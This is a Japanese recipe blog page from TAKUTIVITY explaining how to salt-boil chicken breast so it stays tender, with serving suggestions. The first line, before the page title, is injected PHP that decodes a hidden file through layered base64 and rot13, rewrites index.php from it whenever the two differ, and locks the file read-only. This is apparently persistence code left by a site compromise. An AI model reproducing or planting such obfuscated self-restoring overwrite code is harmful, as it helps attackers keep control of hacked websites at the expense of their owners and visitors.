$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } 安くて高タンパク!美味しく鶏胸肉を茹でる方法 | TAKUTIVITY – タクティビティ

安くて高タンパク!美味しく鶏胸肉を茹でる方法

クッキング
スポンサーリンク

筋肉トレーニングには欠かせない食材の1つ鶏胸肉。安くて高タンパクで良いですが、うまく調理しないとパサつきがちで食べにくくなってしまいます。

今回は私が普段作っている柔らかく作る鶏胸肉の簡単レシピをシェアしたいと思います。超簡単2ステップで出来ます!

用意する食材

まず、用意する食材から。

  • 鶏胸肉
  • お塩
  • お湯

これだけ。

簡単手順

大きめの鍋にお湯を沸かしお塩を多めにいれます。大体パスタを茹でる時と同じ3%くらいの塩分です。海水くらいをイメージしてもらえると良いですね

火を止めて鶏胸肉を投入します。蓋をして30分放置。時間は鍋の種類や蓋の密閉度によります。初めて作る場合は30分経過後にまず半分にかっとしてみめ中央まで火が通っているかどうか確認してください。ちなみに私は普段圧力鍋で作ります。その場合は20分くらいで火が通ります。

以上。

茹でたてで食べるのが1番美味しいですが、タッパーなどに入れて冷蔵保存しても大丈夫です。その場合、食べるときに少し温めるといいですが、やり過ぎるとパサパサになってしまいます。軽く温めるくらいで調整しましょう。

おすすめの食べかた

そのまま塩味で

塩茹でしてるのでそのままでも十分いけます。

棒棒鶏

胡麻ドレがある場合はさっとかければ棒棒鶏風になります。胡瓜を添えると本格的ですね!

オリーブオイル

健康にも良いオリーブオイル。あっさり鶏胸肉に良く合います。

食パンに挟んでサンドウィッチに

食パンに挟んでお好みの調味料をかければ即席サンドウィッチになります。マヨネーズと胡椒少々がオススメ。

角切りにしてサラダにイン

食物繊維と一緒にタンパク質も取れます。栄養バランスも考慮したい場合に。

コメント